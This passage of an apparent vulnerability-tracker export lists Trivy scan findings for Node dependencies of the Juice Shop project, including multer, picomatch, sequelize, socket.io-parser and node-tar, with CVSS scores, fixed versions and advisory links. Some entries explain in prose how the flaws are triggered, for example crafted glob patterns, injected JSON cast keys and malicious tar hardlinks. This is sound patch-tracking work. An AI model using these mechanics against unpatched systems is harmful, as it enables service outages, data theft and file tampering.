NEWLINE NEWLINE Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.1 allows an attacker to trigger a Denial of Service (DoS) by sending an upload file request with an empty string field name. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to `2.0.1` to receive a patch. No known workarounds are available. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/multer/package.json,,True,,False,False,,False,,fff2040ca8b13c9b59000f6cdf210be92bb31f2262e7034a504c81950bff1f30,173,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.376770+00:00,,,,,0,[],2.0.1,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2025-48997 NEWLINE https://github.com/expressjs/multer NEWLINE https://github.com/expressjs/multer/commit/35a3272b611945155e046dd5cef11088587635e9 NEWLINE https://github.com/expressjs/multer/issues/1233 NEWLINE https://github.com/expressjs/multer/pull/1256 NEWLINE https://github.com/expressjs/multer/security/advisories/GHSA-g5hg-p3ph-g8qg NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2025-48997 NEWLINE https://www.cve.org/CVERecord?id=CVE-2025-48997,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2025-48997 Multer 1.4.5-lts.2,False,False,,2026-05-12 17:37:05.376716+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2025-48997,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],multer,1.4.5-lts.2,2026-05-12 17:37:05.380531+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,248,2026-05-12,,,"multer: Multer Denial of Service NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 2.0.2 NEWLINE NEWLINE Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.2 allows an attacker to trigger a Denial of Service (DoS) by sending a malformed multi-part upload request. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to version 2.0.2 to receive a patch. No known workarounds are available. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/multer/package.json,,True,,False,False,,False,,33b43b94f6fc1e88bef206211995c8a1beec0c7191fa649e7364a8811dfdd380,174,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.380590+00:00,,,,,0,[],2.0.2,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2025-7338 NEWLINE https://cna.openjsf.org/security-advisories.html NEWLINE https://github.com/expressjs/multer NEWLINE https://github.com/expressjs/multer/commit/adfeaf669f0e7fe953eab191a762164a452d143b NEWLINE https://github.com/expressjs/multer/security/advisories/GHSA-fjgf-rc76-4x9p NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2025-7338 NEWLINE https://www.cve.org/CVERecord?id=CVE-2025-7338,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2025-7338 Multer 1.4.5-lts.2,False,False,,2026-05-12 17:37:05.380539+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2025-7338,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],multer,1.4.5-lts.2,2026-05-12 17:37:05.384677+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,772,2026-05-12,,,"multer: Multer: Denial of Service via dropped file upload connections NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 2.1.0 NEWLINE NEWLINE Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger a Denial of Service (DoS) by dropping connection during file upload, potentially causing resource exhaustion. Users should upgrade to version 2.1.0 to receive a patch. No known workarounds are available. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/multer/package.json,,True,,False,False,,False,,0f2bfe0f94114d147559ea83b2bb251cc8e430f21b545a814cfd9a6d05d7a651,175,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.384731+00:00,,,,,0,[],2.1.0,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-2359 NEWLINE https://cna.openjsf.org/security-advisories.html NEWLINE https://github.com/expressjs/multer NEWLINE https://github.com/expressjs/multer/commit/cccf0fe0e64150c4f42ccf6654165c0d66b9adab NEWLINE https://github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-2359 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-2359,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-2359 Multer 1.4.5-lts.2,False,False,,2026-05-12 17:37:05.384685+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-2359,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],multer,1.4.5-lts.2,2026-05-12 17:37:05.388609+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,459,2026-05-12,,,"multer: Multer: Denial of Service via malformed requests NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 2.1.0 NEWLINE NEWLINE Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger a Denial of Service (DoS) by sending malformed requests, potentially causing resource exhaustion. Users should upgrade to version 2.1.0 to receive a patch. No known workarounds are available. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/multer/package.json,,True,,False,False,,False,,81c973b6cf74ef76cc96f6c9b6db9ecd909b56649bde3a0932633b49bd77b2b9,176,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.388666+00:00,,,,,0,[],2.1.0,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-3304 NEWLINE https://cna.openjsf.org/security-advisories.html NEWLINE https://github.com/expressjs/multer NEWLINE https://github.com/expressjs/multer/commit/739919097dde3921ec31b930e4b9025036fa74ee NEWLINE https://github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-3304 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-3304,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-3304 Multer 1.4.5-lts.2,False,False,,2026-05-12 17:37:05.388618+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-3304,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],multer,1.4.5-lts.2,2026-05-12 17:37:05.392395+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,674,2026-05-12,,,"multer: Multer: Denial of Service via malformed requests NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 2.1.1 NEWLINE NEWLINE Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.1 allows an attacker to trigger a Denial of Service (DoS) by sending malformed requests, potentially causing stack overflow. Users should upgrade to version 2.1.1 to receive a patch. No known workarounds are available. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/multer/package.json,,True,,False,False,,False,,b86aaf9067f8bea4cf2033e9aadb9fd7db3a811a1fd1e6bb23e31ef647e8f284,177,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.392449+00:00,,,,,0,[],2.1.1,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-3520 NEWLINE https://cna.openjsf.org/security-advisories.html NEWLINE https://github.com/expressjs/multer NEWLINE https://github.com/expressjs/multer/commit/7e66481f8b2e6c54b982b34c152479e096ce2752 NEWLINE https://github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-3520 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-3520,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-3520 Multer 1.4.5-lts.2,False,False,,2026-05-12 17:37:05.392402+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-3520,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],path-to-regexp,0.1.12,2026-05-12 17:37:05.399975+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1333,2026-05-12,,,"path-to-regexp: path-to-regexp: Denial of Service via catastrophic backtracking from malformed URL parameters NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 0.1.13 NEWLINE NEWLINE Impact: NEWLINE NEWLINE A bad regular expression is generated any time you have three or more parameters within a single segment, separated by something that is not a period (.). For example, /:a-:b-:c or /:a-:b-:c-:d. The backtrack protection added in path-to-regexp@0.1.12 only prevents ambiguity for two parameters. With three or more, the generated lookahead does not block single separator characters, so capture groups overlap and cause catastrophic backtracking. NEWLINE NEWLINE Patches: NEWLINE NEWLINE Upgrade to path-to-regexp@0.1.13 NEWLINE NEWLINE Custom regex patterns in route definitions (e.g., /:a-:b([^-/]+)-:c([^-/]+)) are not affected because they override the default capture group. NEWLINE NEWLINE Workarounds: NEWLINE NEWLINE All versions can be patched by providing a custom regular expression for parameters after the first in a single segment. As long as the custom regular expression does not match the text before the parameter, you will be safe. For example, change /:a-:b-:c to /:a-:b([^-/]+)-:c([^-/]+). NEWLINE NEWLINE If paths cannot be rewritten and versions cannot be upgraded, another alternative is to limit the URL length. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/path-to-regexp/package.json,,True,,False,False,,False,,4f8077a7f33e123fb83c2d918a9d7f4db702222c3cdd8285f390600b9c9b2ba5,179,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.400033+00:00,,,,,0,[],0.1.13,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-4867 NEWLINE https://blakeembrey.com/posts/2024-09-web-redos NEWLINE https://cna.openjsf.org/security-advisories.html NEWLINE https://github.com/advisories/GHSA-9wv6-86v2-598j NEWLINE https://github.com/pillarjs/path-to-regexp NEWLINE https://github.com/pillarjs/path-to-regexp/releases/tag/v.0.1.13 NEWLINE https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-37ch-88jc-xwx2 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-4867 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-4867,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-4867 Path-to-Regexp 0.1.12,False,False,,2026-05-12 17:37:05.399984+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-4867,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],picomatch,2.3.1,2026-05-12 17:37:05.403820+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1333,2026-05-12,,,"picomatch: Picomatch: Regular Expression Denial of Service via crafted extglob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 4.0.4, 3.0.2, 2.3.2 NEWLINE NEWLINE Picomatch is a glob matcher written JavaScript. Versions prior to 4.0.4, 3.0.2, and 2.3.2 are vulnerable to Regular Expression Denial of Service (ReDoS) when processing crafted extglob patterns. Certain patterns using extglob quantifiers such as `+()` and `*()`, especially when combined with overlapping alternatives or nested extglobs, are compiled into regular expressions that can exhibit catastrophic backtracking on non-matching input. Applications are impacted when they allow untrusted users to supply glob patterns that are passed to `picomatch` for compilation or matching. In those cases, an attacker can cause excessive CPU consumption and block the Node.js event loop, resulting in a denial of service. Applications that only use trusted, developer-controlled glob patterns are much less likely to be exposed in a security-relevant way. This issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2. Users should upgrade to one of these versions or later, depending on their supported release line. If upgrading is not immediately possible, avoid passing untrusted glob patterns to `picomatch`. Possible mitigations include disabling extglob support for untrusted patterns by using `noextglob: true`, rejecting or sanitizing patterns containing nested extglobs or extglob quantifiers such as `+()` and `*()`, enforcing strict allowlists for accepted pattern syntax, running matching in an isolated worker or separate process with time and resource limits, and applying application-level request throttling and input validation for any endpoint that accepts glob patterns. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/picomatch/package.json,,True,,False,False,,False,,9ad6ef2496fd64df001c54581ed435848d39f4bb46aed204054fe729892c0539,180,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.403969+00:00,,,,,0,[],"4.0.4, 3.0.2, 2.3.2",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-33671 NEWLINE https://github.com/micromatch/picomatch NEWLINE https://github.com/micromatch/picomatch/commit/5eceecd27543b8e056b9307d69e105ea03618a7d NEWLINE https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-33671 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-33671,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-33671 Picomatch 2.3.1,False,False,,2026-05-12 17:37:05.403915+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-33671,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],picomatch,4.0.3,2026-05-12 17:37:05.411292+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1333,2026-05-12,,,"picomatch: Picomatch: Regular Expression Denial of Service via crafted extglob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 4.0.4, 3.0.2, 2.3.2 NEWLINE NEWLINE Picomatch is a glob matcher written JavaScript. Versions prior to 4.0.4, 3.0.2, and 2.3.2 are vulnerable to Regular Expression Denial of Service (ReDoS) when processing crafted extglob patterns. Certain patterns using extglob quantifiers such as `+()` and `*()`, especially when combined with overlapping alternatives or nested extglobs, are compiled into regular expressions that can exhibit catastrophic backtracking on non-matching input. Applications are impacted when they allow untrusted users to supply glob patterns that are passed to `picomatch` for compilation or matching. In those cases, an attacker can cause excessive CPU consumption and block the Node.js event loop, resulting in a denial of service. Applications that only use trusted, developer-controlled glob patterns are much less likely to be exposed in a security-relevant way. This issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2. Users should upgrade to one of these versions or later, depending on their supported release line. If upgrading is not immediately possible, avoid passing untrusted glob patterns to `picomatch`. Possible mitigations include disabling extglob support for untrusted patterns by using `noextglob: true`, rejecting or sanitizing patterns containing nested extglobs or extglob quantifiers such as `+()` and `*()`, enforcing strict allowlists for accepted pattern syntax, running matching in an isolated worker or separate process with time and resource limits, and applying application-level request throttling and input validation for any endpoint that accepts glob patterns. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/tinyglobby/node_modules/picomatch/package.json,,True,,False,False,,False,,02846100c59522b940085c3539597e1a5275a03c01e688aa9e1d73a86b331196,182,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.411346+00:00,,,,,0,[],"4.0.4, 3.0.2, 2.3.2",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-33671 NEWLINE https://github.com/micromatch/picomatch NEWLINE https://github.com/micromatch/picomatch/commit/5eceecd27543b8e056b9307d69e105ea03618a7d NEWLINE https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-33671 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-33671,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-33671 Picomatch 4.0.3,False,False,,2026-05-12 17:37:05.411300+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-33671,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],sanitize-html,1.4.2,2026-05-12 17:37:05.428248+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1333,2026-05-12,,,sanitize-html: insecure global regular expression replacement logic may lead to ReDoS NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 2.7.1 NEWLINE NEWLINE The package sanitize-html before 2.7.1 are vulnerable to Regular Expression Denial of Service (ReDoS) due to insecure global regular expression replacement logic of HTML comment removal. NEWLINE ,False,,,False,,,,False,juice-shop/node_modules/sanitize-html/package.json,,True,,False,False,,False,,5336cfa12cf3900d3fb926e6a85d22a47c2bc12db14156286dbfe08c9a3b5e82,186,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.428315+00:00,,,,,0,[],2.7.1,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2022-25887 NEWLINE https://github.com/apostrophecms/sanitize-html/commit/b4682c12fd30e12e82fa2d9b766de91d7d2cd23c NEWLINE https://github.com/apostrophecms/sanitize-html/pull/557 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2022-25887 NEWLINE https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-3008102 NEWLINE https://security.snyk.io/vuln/SNYK-JS-SANITIZEHTML-2957526 NEWLINE https://ubuntu.com/security/notices/USN-7464-1 NEWLINE https://www.cve.org/CVERecord?id=CVE-2022-25887,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2022-25887 Sanitize-HTML 1.4.2,False,False,,2026-05-12 17:37:05.428255+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2022-25887,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],sequelize,6.37.7,2026-05-12 17:37:05.460052+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N,7.5,,,89,2026-05-12,,,"sequelize: Sequelize: Data exfiltration via SQL injection in JSON/JSONB where clause processing NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 6.37.8 NEWLINE NEWLINE Sequelize is a Node.js ORM tool. Prior to 6.37.8, there is SQL injection via unescaped cast type in JSON/JSONB where clause processing. The _traverseJSON() function splits JSON path keys on :: to extract a cast type, which is interpolated raw into CAST(... AS ) SQL. An attacker who controls JSON object keys can inject arbitrary SQL and exfiltrate data from any table. This vulnerability is fixed in 6.37.8. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/sequelize/package.json,,True,,False,False,,False,,9b71ed405cfa75921c2ba47925c77c12c448ef2f56505b33fc141db2c484ef26,194,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.460105+00:00,,,,,0,[],6.37.8,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-30951 NEWLINE https://github.com/sequelize/sequelize NEWLINE https://github.com/sequelize/sequelize/security/advisories/GHSA-6457-6jrx-69cr NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-30951 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-30951,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-30951 Sequelize 6.37.7,False,False,,2026-05-12 17:37:05.460059+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-30951,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],socket.io-parser,4.0.5,2026-05-12 17:37:05.467773+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,20,2026-05-12,,,"socket.io: Socket.IO: Denial of Service due to excessive buffering of specially crafted packets NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.3.5, 3.4.4, 4.2.6 NEWLINE NEWLINE Socket.IO is an open source, real-time, bidirectional, event-based, communication framework. Prior to versions 3.3.5, 3.4.4, and 4.2.6, a specially crafted Socket.IO packet can make the server wait for a large number of binary attachments and buffer them, which can be exploited to make the server run out of memory. This issue has been patched in versions 3.3.5, 3.4.4, and 4.2.6. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/socket.io-parser/package.json,,True,,False,False,,False,,2e7c7577bec1230199323bc9ab99ba299f2deaf4d36121e9c1812aee010658bb,196,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.467828+00:00,,,,,0,[],"3.3.5, 3.4.4, 4.2.6",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-33151 NEWLINE https://github.com/socketio/socket.io NEWLINE https://github.com/socketio/socket.io/commit/719f9ebab0772ffb882bd614b387e585c1aa75d4 NEWLINE https://github.com/socketio/socket.io/commit/9d39f1f080510f036782f2177fac701cc041faaf NEWLINE https://github.com/socketio/socket.io/commit/b25738c416c4e32fbff62ee182afa8f6d0dacf78 NEWLINE https://github.com/socketio/socket.io/security/advisories/GHSA-677m-j7p3-52f9 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-33151 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-33151,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-33151 socket.io-parser 4.0.5,False,False,,2026-05-12 17:37:05.467781+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-33151,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar,4.4.19,2026-05-12 17:37:05.476089+00:00,,,CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N,8.2,22,2026-05-12,,,"node-tar: tar: node-tar: Arbitrary file overwrite and symlink poisoning via unsanitized linkpaths in archives NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 7.5.3 NEWLINE NEWLINE node-tar is a Tar for Node.js. The node-tar library (<= 7.5.2) fails to sanitize the linkpath of Link (hardlink) and SymbolicLink entries when preservePaths is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning via absolute symlink targets. This vulnerability is fixed in 7.5.3. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json,,True,,False,False,,False,,d15611f52a7c1ebace4796e595cbd4bd9cd55de60bd9c2e03251d4200e3b6474,198,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.476174+00:00,,,,,0,[],7.5.3,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-23745 NEWLINE https://github.com/isaacs/node-tar NEWLINE https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e NEWLINE https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-23745 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-23745,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-23745 Tar 4.4.19,False,False,,2026-05-12 17:37:05.476101+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-23745,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar,4.4.19,2026-05-12 17:37:05.480559+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L,8.8,,,176,2026-05-12,,,"node-tar: tar: node-tar: Arbitrary file overwrite via Unicode path collision race condition NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 7.5.4 NEWLINE NEWLINE node-tar,a Tar for Node.js, has a race condition vulnerability in versions up to and including 7.5.3. This is due to an incomplete handling of Unicode path collisions in the `path-reservations` system. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, In which it has been tested), the library fails to lock colliding paths (e.g., `ß` and `ss`), allowing them to be processed in parallel. This bypasses the library's internal concurrency safeguards and permits Symlink Poisoning attacks via race conditions. The library uses a `PathReservations` system to ensure that metadata checks and file operations for the same path are serialized. This prevents race conditions where one entry might clobber another concurrently. This is a Race Condition which enables Arbitrary File Overwrite. This vulnerability affects users and systems using node-tar on macOS (APFS/HFS+). Because of using `NFD` Unicode normalization (in which `ß` and `ss` are different), conflicting paths do not have their order properly preserved under filesystems that ignore Unicode normalization (e.g., APFS (in which `ß` causes an inode collision with `ss`)). This enables an attacker to circumvent internal parallelization locks (`PathReservations`) using conflicting filenames within a malicious tar archive. The patch in version 7.5.4 updates `path-reservations.js` to use a normalization form that matches the target filesystem's behavior (e.g., `NFKD`), followed by first `toLocaleLowerCase('en')` and then `toLocaleUpperCase('en')`. As a workaround, users who cannot upgrade promptly, and who are programmatically using `node-tar` to extract arbitrary tarball data should filter out all `SymbolicLink` entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json,,True,,False,False,,False,,f5ea7b3070fbaafc39f8219cc94627b72c3b534b472f2306332161b459a9b7a9,199,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.480615+00:00,,,,,0,[],7.5.4,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-23950 NEWLINE https://github.com/isaacs/node-tar NEWLINE https://github.com/isaacs/node-tar/commit/3b1abfae650056edfabcbe0a0df5954d390521e6 NEWLINE https://github.com/isaacs/node-tar/security/advisories/GHSA-r6q2-hw4h-h46w NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-23950 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-23950,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-23950 Tar 4.4.19,False,False,,2026-05-12 17:37:05.480567+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-23950,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar,4.4.19,2026-05-12 17:37:05.484326+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N,8.2,,,22,2026-05-12,,,"node-tar: tar: node-tar: Arbitrary file creation via path traversal bypass in hardlink security check NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 7.5.7 NEWLINE NEWLINE node-tar,a Tar for Node.js, contains a vulnerability in versions prior to 7.5.7 where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory. Version 7.5.7 contains a fix for the issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json,,True,,False,False,,False,,b78954509e5a2b1f814397b776a31927a0736a3aa1ef831a04d733fce704cf78,200,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.484378+00:00,,,,,0,[],7.5.7,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-24842 NEWLINE https://github.com/isaacs/node-tar NEWLINE https://github.com/isaacs/node-tar/commit/f4a7aa9bc3d717c987fdf1480ff7a64e87ffdb46 NEWLINE https://github.com/isaacs/node-tar/security/advisories/GHSA-34x7-hfp2-rc4v NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-24842 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-24842,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-24842 Tar 4.4.19,False,False,,2026-05-12 17:37:05.484334+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-24842,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],tar,4.4.19,2026-05-12 17:37:05.488242+00:00,CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N,7.1,,,22,2026-05-12,,,"node-tar: node-tar: Arbitrary file read/write via malicious archive hardlink creation NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 7.5.8 NEWLINE NEWLINE node-tar is a full-featured Tar for Node.js. When using default options in versions 7.5.7 and below, an attacker-controlled archive can create a hardlink inside the extraction directory that points to a file outside the extraction root, enabling arbitrary file read and write as the extracting user. Severity is high because the primitive bypasses path protections and turns archive extraction into a direct filesystem access primitive. This issue has been fixed in version 7.5.8. NEWLINE 